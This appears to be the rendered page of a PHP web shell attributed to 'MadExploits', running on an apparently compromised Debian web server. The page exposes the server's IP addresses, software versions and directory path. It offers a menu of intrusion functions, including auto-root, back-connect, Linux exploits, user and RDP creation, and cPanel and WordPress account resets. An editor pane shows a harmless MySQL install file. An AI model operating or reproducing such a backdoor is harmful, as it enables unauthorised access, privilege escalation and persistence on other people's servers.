Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.189.143.150
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
includes /
database /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
database.inc
8.17
KB
-rw-r--r--
install.inc
629
B
-rw-r--r--
query.inc
2.84
KB
-rw-r--r--
schema.inc
18.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.inc
<?php /** * @file * Installation code for MySQL embedded database engine. */ /** * Specifies installation tasks for MySQL and equivalent databases. */ class DatabaseTasks_mysql extends DatabaseTasks { /** * The PDO driver name for MySQL and equivalent databases. * * @var string */ protected $pdoDriver = 'mysql'; /** * Returns a human-readable name string for MySQL and equivalent databases. */ public function name() { return st('MySQL, MariaDB, or equivalent'); } /** * Returns the minimum version for MySQL. */ public function minimumVersion() { return '5.0.15'; } }
Close